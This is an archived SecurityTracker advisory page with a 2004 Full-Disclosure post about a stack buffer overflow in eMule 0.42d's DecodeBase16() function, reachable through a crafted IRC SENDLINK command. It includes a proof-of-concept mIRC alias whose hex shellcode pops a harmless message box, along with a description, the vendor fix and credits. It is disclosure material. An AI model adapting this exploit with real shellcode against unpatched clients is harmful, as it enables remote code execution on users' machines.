SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   eMule Vendors:   Emule-Project.net
eMule DecodeBase16() Stack Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1009651
SecurityTracker URL:  http://securitytracker.com/id/1009651
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 3 2004
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 0.42d, possibly earlier versions
Description:   A vulnerability was reported in eMule in the decoding of hexadecimal strings. A remote user can cause arbitrary code to be executed on the target system.

Kostya Kortchinsky reported that there is a stack overflow vulnerability in the DecodeBase16() function, called in the web server code and the IRC client code.

A remote user can exploit this flaw by, for example, sending a specially crafted IRC SENDLINK command to the target user.

A demonstration exploit example is provided in the Source Message.

The vendor was reportedly notified on March 30, 2004.
Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has released a fixed version (0.42e), available at:

http://www.emule-project.net/home/perl/general.cgi?l=1&rm=download
Vendor URL:  www.emule-project.net/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Sat, 03 Apr 2004 11:31:11 +0200
Subject:  [Full-Disclosure] eMule v0.42d Buffer Overflow



eMule v0.42d Buffer Overflow

Description
-----------

A vulnerability exists in eMule v0.42d (and probably earlier versions)
in the DecodeBase16(...) function. This function takes an hexadecimal
string, its length, and a destination buffer (on the stack) as
parameters. The function decodes whatever is supplied, no length check
is performed on the string nor on the buffer, leading to a possible
stack overflow.

The function is called 5 times in the code: 3 times in the web server
(which may require authentication) and 2 times in the IRC client (not
connected by default).

  uchar userid[16];
  DecodeBase16(hash.GetBuffer(),hash.GetLength(),userid);

Proof of concept
----------------

Bourriquet is an mIRC alias exploiting this overflow in v0.42d via the
SENDLINK command, it calls MessageBoxA (to display 'Patch your eMule !')
and then ExitProcess :

/bourriquet { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|,90909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090EB0790907AF65700906681EC400031C96820210000684D756C656875722065686820796F
685061746389E2515152513EFF15C0E76100503EFF1568E461009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090,|,$chr(1))
 

}

Developer response
------------------

The flaw was reported to bluecow from the eMule Team on March, 30th
2004 on IRC. He stated the issue would be patched in the upcoming eMule
release, available here:
http://www.emule-project.net/home/perl/news.cgi?l=1&cat_id=22

An effort was also done in changing the IRC server address and kicking
out vulnerable clients (nice work :)

Solution/Workaround
-------------------

The following options are available:
- upgrade to eMule version 0.42e,
- do not use the eMule web server and IRC client,
- uninstall eMule :)

Credits
-------

The vulnerability was discovered by Kostya Kortchinsky, from CERT
RENATER, on March 24th 2004, following a FHP meeting and a remark from
nico : "eMule and all these P2P tools are better than VNC to get remote
access to a box".

Greetings to the people of the French Honeynet Project, MISC Magazine
and #fee1dead@EFnet.

Advertising
-----------

CanSecWest/core04 : Top security experts. Cutting edge techniques and
information.
  Vancouver, Canada - April 21-23 2004 - http://cansecwest.com

Symposium sur la Sécurité des Technologies de l'Information et des
Communications
  Rennes, France - June 2-4 2004 - http://sstic.org

See you there,

Kostya.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC